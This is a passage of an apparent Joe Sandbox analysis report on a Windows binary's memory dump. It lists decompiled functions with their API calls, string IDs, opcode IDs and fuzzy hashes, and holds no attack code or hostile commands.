                                                                                                          • _wprintf.LIBCMT ref: 00EA01D2
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EA01E9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                          • API String ID: 984253442-2268648507
                                                                                                          • Opcode ID: 30582d227ad3cd733790de92f82b46f818f095bdc6bf0481a7262e708778b8f2
                                                                                                          • Instruction ID: 5d7908a314433d0dc3bb580855f4562d1009e92126cfa0d1a6bffb5a43e46384
                                                                                                          • Opcode Fuzzy Hash: 30582d227ad3cd733790de92f82b46f818f095bdc6bf0481a7262e708778b8f2
                                                                                                          • Instruction Fuzzy Hash: CC41A37280020DAACF14EBE0CD86EEEB7B8EF59341F501565F905B6092EA316F08CB61
                                                                                                          Function 00EAA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00EAAA0E
                                                                                                          • GetDriveTypeW.KERNEL32 ref: 00EAAA5B
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EAAAA3
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EAAADA
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EAAB08
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                          • API String ID: 2698844021-4113822522
                                                                                                          • Opcode ID: ff4f8665738199534d091ab13cfe89f3a1d871e390726bccbd60b861c2b56380
                                                                                                          • Instruction ID: 828f46ca35ee665b957db8ecb9fa02daa9dee29273de43fa098ba7fd4d4e6001
                                                                                                          • Opcode Fuzzy Hash: ff4f8665738199534d091ab13cfe89f3a1d871e390726bccbd60b861c2b56380
                                                                                                          • Instruction Fuzzy Hash: 8A518A712043059FC300EF20D881A6AB7F4FF88758F14596DF896A72A1DB31EE09CB92
                                                                                                          Function 00EAA832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EAA852
                                                                                                          • __swprintf.LIBCMT ref: 00EAA874
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EAA8B1
                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EAA8D6
                                                                                                          • _memset.LIBCMT ref: 00EAA8F5
                                                                                                          • _wcsncpy.LIBCMT ref: 00EAA931
                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EAA966
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EAA971
                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00EAA97A
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EAA984
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                          • String ID: :$\$\??\%s
                                                                                                          • API String ID: 2733774712-3457252023
                                                                                                          • Opcode ID: f7e000c1dc8608767589c5bdf1dc477bfc7343a3abb27cda069e6b6b5b38bea5
                                                                                                          • Instruction ID: 8334c76a33b6f9ad12ad5877bdbf7e9561282f9a9659622694047d8b3e532838
                                                                                                          • Opcode Fuzzy Hash: f7e000c1dc8608767589c5bdf1dc477bfc7343a3abb27cda069e6b6b5b38bea5
                                                                                                          • Instruction Fuzzy Hash: 9331C17150021AABDB219FA1EC48FEF73BCEF89700F1451B6F508E60A0E774A644CB25
                                                                                                          Function 00ECC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EC982C,?,?), ref: 00ECC0C8
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC0DF
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC0EA
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC0F7
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00ECC100
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC10F
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00ECC118
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC11F
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EC982C,?,?,00000000,?), ref: 00ECC130
                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00ED3C7C,?), ref: 00ECC149
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00ECC159
                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00ECC17D
                                                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00ECC1A8
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00ECC1D0
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00ECC1E6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3840717409-0
                                                                                                          • Opcode ID: d19389a5ded8ad7fa998d8d6af7e1c268aae8234bcaf0529d0f020947bb20058
                                                                                                          • Instruction ID: 4bb373f1be5c731400e39b1fea782c4da949bf7cda71af3c770265a9b65b0dd8
                                                                                                          • Opcode Fuzzy Hash: d19389a5ded8ad7fa998d8d6af7e1c268aae8234bcaf0529d0f020947bb20058
                                                                                                          • Instruction Fuzzy Hash: 41415B71502204EFCB118F66DD4CFAEBBB8EF89715F144059F909E7261C7319945DB60
                                                                                                          Function 00ECC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00ECC8A4
                                                                                                          • GetFocus.USER32 ref: 00ECC8B4
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00ECC8BF
                                                                                                          • _memset.LIBCMT ref: 00ECC9EA
                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00ECCA15
                                                                                                          • GetMenuItemCount.USER32(?), ref: 00ECCA35
                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00ECCA48
                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00ECCA7C
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00ECCAC4
                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ECCAFC
                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00ECCB31
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1296962147-4108050209
                                                                                                          • Opcode ID: 6bf9336e91440025aebc804a5e560148e88e76dde849f592a525023428e0f3b9
                                                                                                          • Instruction ID: 74e717e26f2a34fd271bb76fe60beda64e6b03a359ba332560f9efca9d1e3152
                                                                                                          • Opcode Fuzzy Hash: 6bf9336e91440025aebc804a5e560148e88e76dde849f592a525023428e0f3b9
                                                                                                          • Instruction Fuzzy Hash: F8819C706083019FD710DF14DA85F6BBBE4FB88354F24595EF999A3291C732D906CBA2
                                                                                                          Function 00E98ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E98E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E98E3C
                                                                                                            • Part of subcall function 00E98E20: GetLastError.KERNEL32(?,00E98900,?,?,?), ref: 00E98E46
                                                                                                            • Part of subcall function 00E98E20: GetProcessHeap.KERNEL32(00000008,?,?,00E98900,?,?,?), ref: 00E98E55
                                                                                                            • Part of subcall function 00E98E20: HeapAlloc.KERNEL32(00000000,?,00E98900,?,?,?), ref: 00E98E5C
                                                                                                            • Part of subcall function 00E98E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E98E73
                                                                                                            • Part of subcall function 00E98EBD: GetProcessHeap.KERNEL32(00000008,00E98916,00000000,00000000,?,00E98916,?), ref: 00E98EC9
                                                                                                            • Part of subcall function 00E98EBD: HeapAlloc.KERNEL32(00000000,?,00E98916,?), ref: 00E98ED0
                                                                                                            • Part of subcall function 00E98EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E98916,?), ref: 00E98EE1
                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E98B2E
                                                                                                          • _memset.LIBCMT ref: 00E98B43
                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E98B62
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00E98B73
                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E98BB0
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E98BCC
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00E98BE9
                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E98BF8
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00E98BFF
                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E98C20
                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00E98C27
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E98C58
                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E98C7E
                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E98C92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3996160137-0
                                                                                                          • Opcode ID: c868da5e2148ee96b92b901baa6f49cc6d121ffbb51e021f1a5c9b9f464f2db3
                                                                                                          • Instruction ID: 573c332b66a9786fdabe610a5444f53b8b875dfe887e5811e738e7bbdb4dea70
                                                                                                          • Opcode Fuzzy Hash: c868da5e2148ee96b92b901baa6f49cc6d121ffbb51e021f1a5c9b9f464f2db3
                                                                                                          • Instruction Fuzzy Hash: F3616775901209BFDF10DFA1ED44EEEBBB9FF45304F18856AE915B62A0DB319A04CB60
                                                                                                          Function 00EB7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 00EB7A79
                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EB7A85
                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00EB7A91
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00EB7A9E
                                                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EB7AF2
                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EB7B2E
                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EB7B52
                                                                                                          • SelectObject.GDI32(00000006,?), ref: 00EB7B5A
                                                                                                          • DeleteObject.GDI32(?), ref: 00EB7B63
                                                                                                          • DeleteDC.GDI32(00000006), ref: 00EB7B6A
                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00EB7B75
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                          • String ID: (
                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                          • Opcode ID: 540542efaa6ff238d4f68ac5b5f4659cb5cee3622522939d5a35bc71f15d44a7
                                                                                                          • Instruction ID: 7d4d2809c394af585a7efe5ce2d117685a7d1c8a80c7656ee939d18bf2524632
                                                                                                          • Opcode Fuzzy Hash: 540542efaa6ff238d4f68ac5b5f4659cb5cee3622522939d5a35bc71f15d44a7
                                                                                                          • Instruction Fuzzy Hash: 30513971904209EFCB15CFA9DC85FAFBBB9EF48310F14841EF99AA7250D731A9458B60
                                                                                                          Function 00EAA48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EAA4D4
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EAA4F6
                                                                                                          • __swprintf.LIBCMT ref: 00EAA54F
                                                                                                          • __swprintf.LIBCMT ref: 00EAA568
                                                                                                          • _wprintf.LIBCMT ref: 00EAA61E
                                                                                                          • _wprintf.LIBCMT ref: 00EAA63C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 311963372-2391861430
                                                                                                          • Opcode ID: 6b457e569dc77a5a0a213dd4d3d6f2274a984d9aaa4dae112ed69e5a20244fe8
                                                                                                          • Instruction ID: 6732143920a334b0b455f6f3edd292d1c0d9b552e157424a2647cd9e1b622b0e
                                                                                                          • Opcode Fuzzy Hash: 6b457e569dc77a5a0a213dd4d3d6f2274a984d9aaa4dae112ed69e5a20244fe8
                                                                                                          • Instruction Fuzzy Hash: 56519171800209ABCF15EBE0CD46EEEB7B9AF09341F1415A5F905760A2EB316F58DF61
                                                                                                          Function 00EA9710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA951A: __time64.LIBCMT ref: 00EA9524
                                                                                                            • Part of subcall function 00E54A8C: _fseek.LIBCMT ref: 00E54AA4
                                                                                                          • __wsplitpath.LIBCMT ref: 00EA97EF
                                                                                                            • Part of subcall function 00E6431E: __wsplitpath_helper.LIBCMT ref: 00E6435E
                                                                                                          • _wcscpy.LIBCMT ref: 00EA9802
                                                                                                          • _wcscat.LIBCMT ref: 00EA9815
                                                                                                          • __wsplitpath.LIBCMT ref: 00EA983A
                                                                                                          • _wcscat.LIBCMT ref: 00EA9850
                                                                                                          • _wcscat.LIBCMT ref: 00EA9863
                                                                                                            • Part of subcall function 00EA9560: _memmove.LIBCMT ref: 00EA9599
                                                                                                            • Part of subcall function 00EA9560: _memmove.LIBCMT ref: 00EA95A8
                                                                                                          • _wcscmp.LIBCMT ref: 00EA97AA
                                                                                                            • Part of subcall function 00EA9CF1: _wcscmp.LIBCMT ref: 00EA9DE1
                                                                                                            • Part of subcall function 00EA9CF1: _wcscmp.LIBCMT ref: 00EA9DF4
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EA9A0D
                                                                                                          • _wcsncpy.LIBCMT ref: 00EA9A80
                                                                                                          • DeleteFileW.KERNEL32(?,?), ref: 00EA9AB6
                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EA9ACC
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA9ADD
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA9AEF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1500180987-0
                                                                                                          • Opcode ID: 6b9d3aa621cf75cf0727f87f2cf645dd101e80f436cc96ca62306fbe438337c7
                                                                                                          • Instruction ID: f86ce37b23b282692533062fffead5d96d9db4a15a9681c689914c248d66b2c4
                                                                                                          • Opcode Fuzzy Hash: 6b9d3aa621cf75cf0727f87f2cf645dd101e80f436cc96ca62306fbe438337c7
                                                                                                          • Instruction Fuzzy Hash: 75C13DB1900218AADF15DF95CC85ADEB7BDEF49344F0050AAF609F7152EB30AA848F65
                                                                                                          Function 00E55BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00E55BF1
                                                                                                          • GetMenuItemCount.USER32(00F07890), ref: 00E90E7B
                                                                                                          • GetMenuItemCount.USER32(00F07890), ref: 00E90F2B
                                                                                                          • GetCursorPos.USER32(?), ref: 00E90F6F
                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 00E90F78
                                                                                                          • TrackPopupMenuEx.USER32(00F07890,00000000,?,00000000,00000000,00000000), ref: 00E90F8B
                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E90F97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2751501086-0
                                                                                                          • Opcode ID: 91246b8390c42e855e0f3b0290bc3c1ebe7478a4125912c7933837cdb0a7198a
                                                                                                          • Instruction ID: 65450fa1650d2be40449173a6889cc6be7776809594f8ea479339af86cbbef48
                                                                                                          • Opcode Fuzzy Hash: 91246b8390c42e855e0f3b0290bc3c1ebe7478a4125912c7933837cdb0a7198a
                                                                                                          • Instruction Fuzzy Hash: 5171EF31605609BFEF208B55DC85FAABFA4FF44728F541206FA247A1D0C7B16864DB90
                                                                                                          Function 00EAAEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?,00ED0980), ref: 00EAAF4E
                                                                                                          • GetDriveTypeW.KERNEL32(00000061,00EFB5F0,00000061), ref: 00EAB018
                                                                                                          • _wcscpy.LIBCMT ref: 00EAB042
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                          • String ID: L,$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                          • API String ID: 2820617543-2946476599
